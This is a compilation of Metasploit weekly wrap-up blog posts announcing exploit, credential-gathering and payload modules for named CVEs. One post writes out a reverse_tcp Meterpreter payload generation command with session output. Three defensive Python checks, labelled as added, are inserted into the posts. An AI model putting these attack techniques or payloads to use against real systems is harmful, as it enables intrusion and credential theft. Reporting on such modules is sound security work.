Black Hat & DEF CON

Metasploit Weekly Wrap-Up 08/09/2024

Hopefully folks were able to catch our Rapid7 researchers @zeroSteiner and Jack Heysel showing off Metasploit 6.4's features at Black Hat, focusing on combinations that allow for new, streamlined attack workflows. If not, they will also be demoing at DEF CON tomorrow in room W304!

New module content (1)

Calibre Python Code Injection (CVE-2024-6782)

Authors: Amos Ng and Michael Heinzl
Type: Exploit
Pull request: #19357 contributed by h4x-x0r
Path: multi/misc/calibre_exec
AttackerKB reference: CVE-2024-6782

Description: Adds a module targeting CVE-2024-6782, an unauthenticated Python code injection vulnerability in the Content Server component of Calibre v6.9.0 through v7.14.0. The Content Server is disabled by default; once enabled, its default configuration listens on all network interfaces on TCP port 8080. The injected payload is executed in the same context as the Calibre process itself.

Bugs fixed (1)

  • #19355 from dledda-r7 - Fixes an issue where Meterpreter sessions would fail to migrate when MeterpreterDebugBuild is enabled.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
commercial edition Metasploit Pro

Metasploit goes to Hacker Summer Camp

Metasploit Weekly Wrap-Up 08/02/2024

Next week, Metasploit will have demos at both Black Hat and DEF CON where the latest functionality from this year will be presented. The Black Hat demo will be on Thursday the 8th from 10:10 to 11:25 and the DEF CON demo will be on Saturday the 10th from 12:00 to 13:45.

The highlights will include demonstrations of:

New module content (2)

OpenMediaVault rpc.php Authenticated Cron Remote Code Execution

Authors: Brandon Perry bperry.volatile@gmail.com and h00die-gr3y h00die.gr3y@gmail.com
Type: Exploit
Pull request: #19298 contributed by h00die-gr3y
Path: unix/webapp/openmediavault_auth_cron_rce
AttackerKB reference: CVE-2013-3632

Description: This adds a new module that leverages a vulnerability in OpenMediaVault versions from 1.0 through the recent release 7.4.2-2. The vulnerability (CVE-2013-3632) allows an authenticated user to create cron jobs that run as root and thereby achieve remote code execution.

mySCADA MyPRO Authenticated Command Injection (CVE-2023-28384)

Author: Michael Heinzl
Type: Exploit
Pull request: #19337 contributed by h4x-x0r
Path: windows/scada/mypro_cmdexe
AttackerKB reference: CVE-2023-28384

Description: This adds an exploit module for CVE-2023-28384, a command injection vulnerability in MySCADA MyPRO versions 2.28 and earlier that allows the execution of arbitrary commands as NT AUTHORITY\SYSTEM.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

  • #19331 from Takahiro-Yoko - This updates the linux/http/empire_skywalker exploit module to add a new technique that leverages a path traversal vulnerability in BC Security Empire versions before 5.9.3 (CVE-2024-6127). An attacker can achieve unauthenticated remote code execution over HTTP by posing as a normal agent. The module can still be used against older ProjectEmpire/Empire versions by setting a specific datastore option.
  • #19344 from jheysel-r7 - This updates the windows/http/forticlient_ems_fctid_sqli exploit module to gain code execution on affected FortiClient EMS versions in the 7.2.x range.


Infiltrate the Broadcast!

Metasploit Weekly Wrap-Up 05/23/2024

A new module from Chocapikk allows the user to perform remote code execution on vulnerable versions (12.4 - 14.2) of the streaming platform AVideo. The multi/http/avideo_wwbnindex_unauth_rce module leverages CVE-2024-31819, a local file inclusion that is turned into code execution with PHP filter chaining, to gain unauthenticated, unprivileged access, earning it an attacker value of High on AttackerKB.

New module content (8)

Chaos RAT XSS to RCE

Authors: chebuya and h00die
Type: Exploit
Pull request: #19104 contributed by h00die
Path: linux/http/chaos_rat_xss_to_rce
AttackerKB reference: CVE-2024-30850

Description: Adds an exploit for CHAOS v5.0.8, which contains a remote command execution vulnerability that can be triggered through one of three routes: valid credentials, a JWT token taken from an agent, or an agent executable from which the module extracts the JWT token.

AVideo WWBNIndex Plugin Unauthenticated RCE

Author: Valentin Lobstein
Type: Exploit
Pull request: #19071 contributed by Chocapikk
Path: multi/http/avideo_wwbnindex_unauth_rce
AttackerKB reference: CVE-2024-31819

Description: Adds a module for CVE-2024-31819 which exploits an LFI in AVideo which uses PHP Filter Chaining to turn the LFI into unauthenticated RCE.

NorthStar C2 XSS to Agent RCE

Authors: chebuya and h00die
Type: Exploit
Pull request: #19102 contributed by h00die
Path: windows/http/northstar_c2_xss_to_agent_rce
AttackerKB reference: CVE-2024-28741

Description: Adds an exploit for CVE-2024-28741 which exploits an XSS vulnerability in Northstar C2.

Adi IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19169 contributed by The-Pink-Panther
Path: windows/gather/credentials/adi_irc

Description: This adds a gather module leveraging Packrat targeting the Adi IRC client.

CarotDAV credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19173 contributed by The-Pink-Panther
Path: windows/gather/credentials/carotdav_ftp

Description: This adds a gather module leveraging Packrat targeting the CarotDAV FTP client.

Halloy IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19165 contributed by The-Pink-Panther
Path: windows/gather/credentials/halloy_irc

Description: This adds a module leveraging Packrat to gather credentials against the Halloy IRC client.

Quassel IRC credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19166 contributed by The-Pink-Panther
Path: windows/gather/credentials/quassel_irc

Description: This adds a gather module leveraging Packrat targeting the Quassel IRC client.

Sylpheed email credential gatherer

Authors: Barwar Salim M, Daniel Hallsworth, Jacob Tierney, Kazuyoshi Maruta, and Z. Cliffe Schreuders
Type: Post
Pull request: #19171 contributed by The-Pink-Panther
Path: windows/gather/credentials/sylpheed

Description: This adds a gather module leveraging Packrat targeting the Sylpheed email client.

Enhancements and features (1)

  • #19189 from adfoster-r7 - Updates Metasploit framework's default Ruby version to 3.1.5; newer Ruby versions are also supported.

Bugs fixed (4)

  • #19002 from adfoster-r7 - Fixed persistent jobs not working after restarting msfconsole.
  • #19170 from sjanusz-r7 - Fixes the smb_lookupsid module hanging with STATUS_PENDING when running against Samba targets.
  • #19186 from dwelch-r7 - Fixes a bug where the show advanced command could show normal options.
  • #19192 from adfoster-r7 - Fix crashing mipsel modules when running Ruby 3.3.0.


Metasploit Wrap-Up 03/15/2024

New module content (3)

GitLab Password Reset Account Takeover

Authors: asterion04 and h00die
Type: Auxiliary
Pull request: #18716 contributed by h00die
Path: admin/http/gitlab_password_reset_account_takeover
AttackerKB reference: CVE-2023-7028

Description: This adds an auxiliary module that leverages an account takeover vulnerability to take control of a GitLab account without user interaction. The vulnerability lies in the password reset functionality: it is possible to supply two email addresses so that the reset code is sent to both. Supplying the email address of the target account together with one the attacker controls therefore allows the target's password to be reset.
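The detection side of the bug above, as an added example that is not part of the original post and not GitLab's or Metasploit's code: a legitimate reset request names one address, the takeover request names two, so a log-review pass only has to count them. The endpoint path /users/password and the parameter names user[email][] (form-encoded) and user.email (JSON) are assumptions, as are the sample requests.

```python
"""Flag password-reset requests that carry more than one e-mail address
(the pattern behind the GitLab takeover, CVE-2023-7028). Added example.

Assumptions (not stated in the post): the reset endpoint is POST /users/password,
and the address travels as the Rails array parameter user[email][] (form-encoded)
or as user.email (JSON). All requests below are constructed samples.
"""
from __future__ import annotations

import json
from urllib.parse import parse_qs, urlsplit

RESET_PATH = "/users/password"   # assumed path of the reset endpoint
EMAIL_PARAM = "user[email][]"    # assumed Rails array parameter name


def reset_emails(body: str) -> list[str]:
    """All e-mail values in a reset request body, for form-encoded or JSON bodies."""
    stripped = body.lstrip()
    if stripped.startswith("{"):
        try:
            value = json.loads(stripped).get("user", {}).get("email", [])
        except (ValueError, AttributeError):
            return []
        return [str(v) for v in value] if isinstance(value, list) else [str(value)]
    params = parse_qs(body, keep_blank_values=True)
    # Accept both the array form and a plain scalar user[email]
    return params.get(EMAIL_PARAM, []) + params.get("user[email]", [])


def is_suspicious_reset(method: str, path: str, body: str) -> bool:
    """True when a POST to the reset endpoint names more than one distinct address."""
    if method.upper() != "POST" or urlsplit(path).path != RESET_PATH:
        return False
    distinct = {e.strip().lower() for e in reset_emails(body)}
    return len(distinct) > 1


# Constructed sample traffic: (method, path, body)
SAMPLE_REQUESTS = [
    ("POST", "/users/password", "user%5Bemail%5D%5B%5D=alice%40example.test"),
    ("POST", "/users/password",
     "user%5Bemail%5D%5B%5D=alice%40example.test"
     "&user%5Bemail%5D%5B%5D=attacker%40evil.test"),
    ("POST", "/users/sign_in", "user%5Blogin%5D=alice&user%5Bpassword%5D=hunter2"),
    ("GET", "/users/password/new", ""),
]


def flagged(requests=SAMPLE_REQUESTS) -> list[tuple[str, str, str]]:
    """The requests a log-review pass would raise for follow-up."""
    return [r for r in requests if is_suspicious_reset(*r)]


if __name__ == "__main__":
    for method, path, body in flagged():
        print(f"suspicious reset: {method} {path} -> {reset_emails(body)}")
```

The check deduplicates case-insensitively so that the same address repeated twice is not flagged; only two different addresses in one reset request are.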

MinIO Bootstrap Verify Information Disclosure

Authors: RicterZ and joel <joel @ ndepthsecurity>
Type: Auxiliary
Pull request: #18775 contributed by 6a6f656c
Path: gather/minio_bootstrap_verify_info_disc
AttackerKB reference: CVE-2023-28432

Description: This adds an auxiliary module that leverages an information disclosure (CVE-2023-28432) in a cluster deployment of MinIO versions from RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z. This retrieves all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD.
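Two things an operator wants from the MinIO finding above: whether a given node's release tag falls inside the affected window, and which of the returned environment variables are credentials. The following is an added example, not MinIO's or Metasploit's code; it assumes MinIO release tags have the RELEASE.YYYY-MM-DDTHH-MM-SSZ form the post quotes, and the environment dump is a constructed sample.

```python
"""Release-window and impact check for the MinIO bootstrap-verify disclosure
(CVE-2023-28432). Added example; not Metasploit or MinIO code.

Assumptions (not from the post): MinIO reports its version as
RELEASE.YYYY-MM-DDTHH-MM-SSZ, and the disclosed environment is a flat mapping
of variable names to values. SAMPLE_ENV is constructed.
"""
from __future__ import annotations

import re
from datetime import datetime, timezone

RELEASE_RE = re.compile(r"^RELEASE\.(\d{4}-\d{2}-\d{2}T\d{2}-\d{2}-\d{2})Z$")

# Affected window quoted in the post: first vulnerable release (inclusive)
# and the release that fixed it (exclusive upper bound).
FIRST_VULNERABLE = "RELEASE.2019-12-17T23-16-33Z"
FIXED = "RELEASE.2023-03-20T20-16-18Z"


def parse_release(version: str) -> datetime:
    """Turn a MinIO release tag into a datetime so tags compare chronologically."""
    m = RELEASE_RE.match(version.strip())
    if not m:
        raise ValueError(f"not a MinIO release tag: {version!r}")
    return datetime.strptime(m.group(1), "%Y-%m-%dT%H-%M-%S").replace(tzinfo=timezone.utc)


def is_vulnerable_release(version: str) -> bool:
    """True when the tag lies in [FIRST_VULNERABLE, FIXED)."""
    v = parse_release(version)
    return parse_release(FIRST_VULNERABLE) <= v < parse_release(FIXED)


# Variable-name fragments that mean a credential was disclosed.
SECRET_MARKERS = ("SECRET", "PASSWORD", "TOKEN", "KEY")


def redact(value: str) -> str:
    """Keep two characters at each end so a finding is recognisable but not reusable."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def exposed_secrets(env: dict[str, str]) -> dict[str, str]:
    """The credential-bearing variables from a disclosed environment, redacted for reporting."""
    return {
        name: redact(value)
        for name, value in env.items()
        if any(marker in name.upper() for marker in SECRET_MARKERS)
    }


# Constructed sample of what a vulnerable node might return.
SAMPLE_ENV = {
    "MINIO_ROOT_USER": "minioadmin",
    "MINIO_ROOT_PASSWORD": "S3cretPassw0rd!",
    "MINIO_SECRET_KEY": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY",
    "MINIO_VOLUMES": "http://minio{1...4}/data",
    "PATH": "/usr/local/bin:/usr/bin",
}

if __name__ == "__main__":
    for tag in ("RELEASE.2019-12-12T10-20-42Z", "RELEASE.2022-01-08T03-11-54Z", FIXED):
        print(tag, "vulnerable" if is_vulnerable_release(tag) else "not vulnerable")
    for name, value in exposed_secrets(SAMPLE_ENV).items():
        print(f"{name}={value}")
```

Because the tags are timestamps, a string comparison would also work for well-formed input, but parsing them rejects anything that is not a real release tag (a version string from a different product, for instance) rather than silently misordering it.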

JetBrains TeamCity Unauthenticated Remote Code Execution

Author: sfewer-r7
Type: Exploit
Pull request: #18922 contributed by sfewer-r7
Path: multi/http/jetbrains_teamcity_rce_cve_2024_27198
AttackerKB reference: CVE-2024-27198

Description: This adds an exploit module that leverages an authentication bypass vulnerability in JetBrains TeamCity (CVE-2024-27198) to achieve unauthenticated RCE. The authentication bypass enables access to the REST API and creates a new administrator access token. This token can be used to upload a plugin which contains a Metasploit payload.

Enhancements and features (5)

  • #18835 from zgoldman-r7 - This PR reduces code duplication in the modules/exploits/windows/mssql/mssql_payload module.
  • #18899 from zeroSteiner - Updates the tools/payloads/ysoserial/dot_net.rb tool to add options for encoding the resulting payload as a viewstate.
  • #18930 from dwelch-r7 - This PR adds the ability to run a help command from within the interactive SQL prompt.
  • #18931 from cgranleese-r7 - Adds additional help information when interacting with an SQL session.
  • #18932 from adfoster-r7 - This PR adds PostgreSQL session type acceptance tests using Allure report generation as well as a local test module.

Bugs fixed (5)

  • #18944 from zeroSteiner - This fixes an issue when saving and loading DNS rules from the config.
  • #18945 from adfoster-r7 - Fixes an issue that caused a crash when running http crawler with database connected.
  • #18949 from zeroSteiner - This updates the DNS feature to notify the user a restart is required when the feature is enabled or disabled.
  • #18952 from cgranleese-r7 - Updates Postgres hashdump module to now work with newer versions of Postgres.
  • #18954 from adfoster-r7 - This PR fixes an issue where modules were not honoring spooler settings.

Documentation added (3)

  • #18868 from zeroSteiner - This adds documentation for the new DNS command.
  • #18937 from jjoshm - Fixes a typo in the Kerberos documentation.
  • #18951 from adfoster-r7 - This PR improves documentation on running Postgres acceptance tests locally.

You can always find more documentation on our docsite at docs.metasploit.com.


Getting Looney with Privilege Escalation

Metasploit Weekly Wrap-Up

As if Metasploit couldn’t get any loonier, this release adds a brand new exploit module for the glibc tunables privilege escalation, aka Looney Tunables. Using linux/local/glibc_tunables_priv_esc, you can check your target’s glibc version to see if it’s vulnerable to the buffer overflow described in CVE-2023-4911. If so, the module drops a Python script and escalates your privileges to root, returning a session running as the root user. Happy Tuning!

New module content (3)

Vinchin Backup and Recovery Command Injection

Authors: Gregory Boddin (LeakIX) and Valentin Lobstein
Type: Exploit
Pull request: #18542 contributed by Chocapikk
Path: linux/http/vinchin_backup_recovery_cmd_inject

Description: This adds an exploit module for a command injection vulnerability in Vinchin Backup & Recovery versions v5.0, v6.0, v6.7, and v7.0. This leverages two vulnerabilities identified as CVE-2023-45499 and CVE-2023-45498.

Glibc Tunables Privilege Escalation CVE-2023-4911 (aka Looney Tunables)

Authors: Qualys Threat Research Unit, blasty peter@haxx.in, and jheysel-r7
Type: Exploit
Pull request: #18541 contributed by jheysel-r7
Path: linux/local/glibc_tunables_priv_esc

Description: This adds an exploit module for the "Looney Tunables" Linux LPE, identified as CVE-2023-4911. It checks the version of glibc running on the target to make sure it is vulnerable and, once verified, it drops a python script that exploits the vulnerability and returns a session running in the context of the root user.

Atlassian Confluence Unauth JSON setup-restore Improper Authorization leading to RCE (CVE-2023-22518)

Author: jheysel-r7
Type: Exploit
Pull request: #18566 contributed by jheysel-r7
Path: multi/http/atlassian_confluence_unauth_backup

Description: This adds an exploit module for CVE-2023-22518, an improper authorization vulnerability in Confluence that allows an attacker to upload and restore a .zip backup file containing a known user name and password. The attacker can then log in with the credentials from the backup file to gain administrative access to the server.

Enhancements and features (2)

  • #18622 from zeroSteiner - Updates the auxiliary/scanner/dcerpc/petitpotam module to work with newer Windows Server releases.
  • #18623 from gardnerapp - This updates the file handling of the generate command's -o parameter to expand file system paths.

Bugs fixed (1)

Documentation added (1)

  • #18477 from AleksaZatezalo - This adds documentation for the auxiliary/scanner/nessus/nessus_rest_login module.

You can always find more documentation on our docsite at docs.metasploit.com.


Fly High in the Sky With This New Cloud Exploit!

Metasploit Weekly Wrap-Up

This week, a new module was added that takes advantage of both authentication bypass and command injection in certain versions of Western Digital's MyCloud hardware. Submitted by community member Erik Wynter, this module gains access to the target, attempts to bypass authentication, verifies whether that was successful, then executes the payload with root privileges. This works on versions before 2.30.196, and offers a lot of flexibility in just a few commands. See the original PR for more info!

OSX Meterpreter support for M1 and M2 devices

Thanks to the great work of usiegl00, Metasploit now has payload support for both M1 and M2 Arm64 devices that run without the x64 Rosetta emulator being installed on the target machine.

The new payloads are:
osx/aarch64/meterpreter/reverse_tcp
osx/aarch64/meterpreter_reverse_https
osx/aarch64/meterpreter_reverse_tcp
osx/aarch64/meterpreter_reverse_http

Example of generating a payload:

msf6 > use payload/osx/aarch64/meterpreter_reverse_tcp
msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > generate -f macho -o /Users/user/Desktop/payload_stageless LHOST=127.0.0.1
[*] Writing 812819 bytes to /Users/user/Desktop/payload_stageless...

After executing the payload on the remote host, the session will open and can be interacted with:

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) >
[*] Transmitting first stager...(328 bytes)
[*] Transmitting second stager...(65536 bytes)
[*] Sending stage (812819 bytes) to 127.0.0.1
[*] Meterpreter session 8 opened (127.0.0.1:4444 -> 127.0.0.1:49167) at 2023-07-31 16:19:23 -0500

msf6 payload(osx/aarch64/meterpreter_reverse_tcp) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > getuid
Server username: demo
meterpreter > sysinfo
Computer     : demo.local
OS           : macOS Ventura (macOS 13.2.0)
Architecture : arm64
BuildTuple   : aarch64-apple-darwin
Meterpreter  : aarch64/osx
meterpreter >

Metasploit takes to the road

Next week, part of the Metasploit team will be in Las Vegas for Black Hat, BSides Las Vegas and DEF CON. Our own Spencer McIntyre will be demonstrating some of the latest Metasploit features and workflows for targeting Active Directory at both Black Hat and DEF CON. Be sure to stop by and check it out. We’ll also be giving out the local currency of stickers.

  • Black Hat on Thursday, August 10th at 13:00-14:30 in the Business Hall
  • DEF CON on Friday, August 11th at 10:00-12:00 in the Committee Boardroom

New module content (10)

Citrix ADC (NetScaler) Forms SSO Target RCE

Authors: Douglass McKee, Ron Bowes, and Spencer McIntyre
Type: Exploit
Pull request: #18240 contributed by zeroSteiner
Path: exploits/freebsd/http/citrix_formssso_target_rce
AttackerKB reference: CVE-2023-3519

Description: This adds an exploit for CVE-2023-3519 which is an unauthenticated RCE in Citrix ADC. By making a specially crafted HTTP GET request, an attacker can trigger a stack buffer overflow within the nsppe process which runs as root.

Western Digital MyCloud unauthenticated command injection

Authors: Erik Wynter, Remco Vermeulen, and Steven Campbell
Type: Exploit
Pull request: #18221 contributed by ErikWynter
Path: exploits/linux/http/wd_mycloud_unauthenticated_cmd_injection
AttackerKB reference: CVE-2018-17153

Description: This adds an exploit module for an authentication bypass vulnerability (CVE-2018-17153) and a command injection vulnerability (CVE-2016-10108) in Western Digital MyCloud before 2.30.196. The module first checks whether the target is vulnerable by attempting the authentication bypass and then injecting a simple echo command. If the target is confirmed to be vulnerable, the module uses the same command injection to execute the payload with root privileges.

Rudder Server SQLI Remote Code Execution

Author: Ege Balcı
Type: Exploit
Pull request: #18205 contributed by EgeBalci
Path: exploits/multi/http/rudder_server_sqli_rce
AttackerKB reference: CVE-2023-30625

Description: This adds an exploit module that leverages an SQL injection vulnerability (CVE-2023-30625) in RudderStack's rudder-server to achieve unauthenticated remote code execution. The vulnerability affects versions of rudder-server before 1.3.0-rc.1.

Intelliants Subrion CMS 4.2.1 - Authenticated File Upload Bypass to RCE

Authors: Fellipe Oliveira, Hexife, and Ismail E. Dawoodjee
Type: Exploit
Pull request: #18211 contributed by ismaildawoodjee
Path: exploits/multi/http/subrion_cms_file_upload_rce
AttackerKB reference: CVE-2018-19422

Description: This adds an exploit module that leverages an authenticated file upload vulnerability in Subrion CMS versions 4.2.1 and prior. Due to an issue in the way the .htaccess file is configured by default, it is possible to upload PHP code to the web server and achieve remote code execution.

AWS Instance Connection

Author: sempervictus
Type: Payload
Pull request: #17600 contributed by sempervictus
Path: payloads/singles/cmd/unix/bind_aws_instance_connect

Description: This adds a command payload that establishes a bind session over AWS EC2 Instance Connect.

OSX AArch64 Payload Support

Author: usiegl00
Type: Payload
Pull request: #17129 contributed by usiegl00
Path: payloads/singles/osx/aarch64/meterpreter_reverse_http

Description: Adds new support for multiple OSX AArch64 payloads: osx/aarch64/meterpreter/reverse_tcp, osx/aarch64/meterpreter_reverse_https, osx/aarch64/meterpreter_reverse_tcp, osx/aarch64/meterpreter_reverse_http. This enables the use of native payloads on M1 or M2 OSX devices that do not have Rosetta installed.

Enhancements and features (4)

  • #18223 from adfoster-r7 - This PR fixes broken msfconsole command history management when switching between shell sessions.
  • #18239 from h00die - Adds verified version numbers (1.12.1, 1.12.1-RC2, and 1.20.0) to the exploits/multi/http/apache_nifi_processor_rce RCE module.
  • #18249 from adfoster-r7 - Provide better error messages when failing to load Mettle extensions, such as the extended API extapi.
  • #18255 from adfoster-r7 - Removes Python2 support from the Metasploit docker container now that it is officially end of life, and no longer used by Metasploit. Python3 support remains available.

Bugs fixed (6)

  • #18203 from adfoster-r7 - Fixes a crash when running the scanner/ssh/libssh_auth_bypass module on newer versions of Ruby.
  • #18209 from adfoster-r7 - This fixes an issue in the windows/local/bypassuac_comhijack exploit module, which was breaking due to a syntax error.
  • #18234 from D00Movenok - This fixes a bug in the 64-bit messagebox payload where it would fail to execute if user32 was not already loaded.
  • #18238 from dwelch-r7 - Fixes an issue with scanner modules when USERNAME, USER_FILE and PASS_FILE are all set. Previously the first username in USER_FILE was not tested against any password in PASS_FILE.
  • #18243 from adfoster-r7 - This PR fixes an issue where an AppScan import would fail due to an empty proof.
  • #18248 from adfoster-r7 - Fix bootup warning when running the JSON msfrpc service.


Fetch Based Payloads: Making the Path from Command Injection to Metasploit Session Shorter

Metasploit Weekly Wrap-Up

This week we’re releasing Metasploit fetch payloads. Fetch payloads are command-based payloads that use network-enabled applications already present on remote hosts, together with servers for different protocols, to serve, download, and execute binary payloads. Over the last year, two thirds of the exploit modules landed in Metasploit Framework were command injection exploits, and these exploits will be much easier to write with the new payloads. You can check out the documentation here, and we’ll have a longer blog post on the feature out soon.

New Exploit: Privilege Escalation for invscout RPM

AIX systems up to and including 7.2 are vulnerable to a command injection in the invscout utility. Tim Brown and bcoles created a new module that takes advantage of this to escalate privileges to root. It addresses CVE-2023-28528 and is available to Framework users now via use exploit/aix/local/invscout_rpm_priv_esc.

New module content (3)

invscout RPM Privilege Escalation

Authors: Tim Brown and bcoles
Type: Exploit
Pull request: #17993 contributed by bcoles
AttackerKB reference: CVE-2023-28528

Description: This module leverages a command injection vulnerability in the setuid invscout utility on AIX systems 7.2 and prior to achieve effective-uid root privileges.

Ivanti Avalanche FileStoreConfig File Upload

Authors: Piotr Bazydlo and Shelby Pace
Type: Exploit
Pull request: #17979 contributed by space-r7
ZDI reference: ZDI-23-456

Description: An exploit has been added for CVE-2023-28128, an authenticated file upload vulnerability in Ivanti Avalanche versions below v6.4.0.186 that allows authenticated administrators to change the default path to the web root of the application, upload a JSP file, and achieve RCE as NT AUTHORITY\SYSTEM. This occurs because Ivanti Avalanche does not properly validate MS-DOS style short names in the configuration path.

Fetch Based Payloads

Author: Brendan Watters
Type: Payload
Pull request: #17782 contributed by bwatters-r7

Description: This adds a set of command payloads that facilitate fetching and executing a payload file from Metasploit.

Enhancements and features (3)

  • #17985 from spmedia - Fixes a typo in the post/windows/manage/sticky_keys module.
  • #17990 from bcoles - Adds AutoCheck functionality and notes metadata to exploits/aix/local/ibstat_path.
  • #17991 from rad10 - A default configuration file has been added for Solargraph, a language server that can help VS Code users (and users of other code editors that might not have a language server built in) obtain IntelliSense, in-line documentation, and code completion functionality for Metasploit's code. For VS Code users, it is recommended to install the Solargraph plugin here to take advantage of this change.

Bugs fixed (3)

  • #17967 from adfoster-r7 - Fixes Ruby 3.1 crashes and resource leaks when garbage collecting Meterpreter resources.
  • #18005 from adfoster-r7 - This fixes a crash when running a module through Socks4a proxy.
  • #18006 from adfoster-r7 - This fixes an error when msfconsole opens browser links without a display present.


2022 Vulnerability Intelligence Report Released

Metasploit Weekly Wrap-Up

Rapid7’s broader vulnerability research team released our 2022 Vulnerability Intelligence Report this week. The report includes Metasploit and research team data on exploitation, exploitability, and vulnerability profiles that are intended to help security teams understand and prioritize risk more effectively. Put simply, security teams have way too much to do in a threat climate that’s seen some pretty crazy escalation the past few years, and understanding attack trends can help them make better risk-based choices.

There are some longer threads on key findings on Twitter and Mastodon. Some of the highlights:

  • Rapid7 researchers saw a modest decrease in both widespread exploitation and zero-day exploitation of new vulnerabilities in 2022. Alas, widespread threats are still the majority of 2022 vulnerabilities in our dataset, and are double what they were in 2020.
  • Attackers keep getting faster — more than half the vulns in the report were exploited within a week.
  • Ransomware CVE stats got weird in 2022. There are probably a lot of intersectional reasons for this.

Read the full report here!

New module content (4)

Softing Secure Integration Server Login Utility

Author: Imran E. Dawoodjee
Type: Auxiliary
Pull request: #17676 contributed by ide0x90

Description: This adds a login module for the Softing Secure Integration Server software.

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload

Authors: HMs, l1k3beef, and sf
Type: Exploit
Pull request: #17624 contributed by sfewer-r7
AttackerKB reference: CVE-2022-21587

Description: This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through 12.2.11, which results in remote code execution. This vulnerability has been observed to be exploited in the wild.

Lucee Authenticated Scheduled Job Code Execution

Author: Alexander Philiotis
Type: Exploit
Pull request: #17638 contributed by JBince

Description: This adds a module to execute code using Lucee's scheduled job functionality. The feature requires authentication as an administrator by default and allows a ColdFusion page to be rendered, which is used to execute an OS command via the cfexecute tag. The module works on both Linux and Windows targets.

Disable ClamAV

Author: DLL_Cool_J
Type: Post
Pull request: #17672 contributed by archcloudlabs

Description: This PR includes a post module that disables ClamAV on Linux systems. The bug resides in the ClamAV Unix socket permissions, which permit any local user to submit the SHUTDOWN command and thereby stop ClamAV.
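The defender's counterpart to the module above is checking whether clamd's control socket is reachable by untrusted local users at all. The following is an added example, not ClamAV's or Metasploit's code: it parses the LocalSocket / LocalSocketMode / LocalSocketGroup directives of a clamd.conf and reports a world-writable or unscoped group-writable socket. Both configuration samples are constructed; the live probe sends the harmless PING command rather than SHUTDOWN and is not exercised offline.

```python
"""Check a clamd.conf for local-socket permissions that let any local user send
SHUTDOWN to clamd. Added example; not Metasploit's or ClamAV's code.

Assumptions (not from the post): the socket is configured with clamd's
LocalSocket / LocalSocketMode / LocalSocketGroup directives, and a mode with
the world-write bit set is what the post calls the "bug". Both configs below
are constructed samples.
"""
from __future__ import annotations

import socket

WEAK_CONF = """\
# clamd.conf (constructed sample)
LocalSocket /var/run/clamav/clamd.ctl
LocalSocketMode 666
FixStaleSocket true
"""

HARDENED_CONF = """\
# clamd.conf (constructed sample)
LocalSocket /var/run/clamav/clamd.ctl
LocalSocketGroup clamav
LocalSocketMode 660
FixStaleSocket true
"""


def parse_clamd_conf(text: str) -> dict[str, str]:
    """Minimal clamd.conf parser: 'Directive value' lines, '#' comments ignored."""
    conf: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split(None, 1)
        conf[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return conf


def socket_findings(conf: dict[str, str]) -> list[str]:
    """Why the configured Unix socket lets untrusted local users talk to clamd."""
    if "LocalSocket" not in conf:
        return []                                   # no local socket; nothing to check
    mode = conf.get("LocalSocketMode")
    if mode is None:
        return ["LocalSocketMode not set: permissions depend on the clamd umask"]
    try:
        bits = int(mode, 8)
    except ValueError:
        return [f"LocalSocketMode {mode!r} is not an octal mode"]
    if bits & 0o002:
        return [f"LocalSocketMode {mode}: world-writable, any local user can send SHUTDOWN"]
    if bits & 0o020 and "LocalSocketGroup" not in conf:
        return [f"LocalSocketMode {mode}: group-writable but no LocalSocketGroup set"]
    return []


def clamd_ping(path: str, timeout: float = 2.0) -> bool:
    """Live check (not run offline): can the current user reach clamd at all?
    Uses the harmless zPING command; clamd answers PONG."""
    try:
        with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            s.connect(path)
            s.sendall(b"zPING\0")
            return s.recv(16).startswith(b"PONG")
    except OSError:
        return False


if __name__ == "__main__":
    for label, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, socket_findings(parse_clamd_conf(text)) or ["ok"])
```

Restricting the mode to 660 with a dedicated LocalSocketGroup limits the SHUTDOWN command to members of that group; a TCPSocket listener, if one is configured, has no equivalent file permission and needs a firewall rule instead.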

Enhancements and features (2)

  • #17635 from dwelch-r7 - Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum
  • #17699 from gwillcox-r7 - This adds SCHANNEL authentication support to LDAP modules.

Bugs fixed (5)

  • #17562 from gwillcox-r7 - This fixes some incorrect Railgun definitions for the wldap32 Windows library.
  • #17679 from adfoster-r7 - This PR fixes the broken payload selection for Metasploit RPC
  • #17696 from zeroSteiner - The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
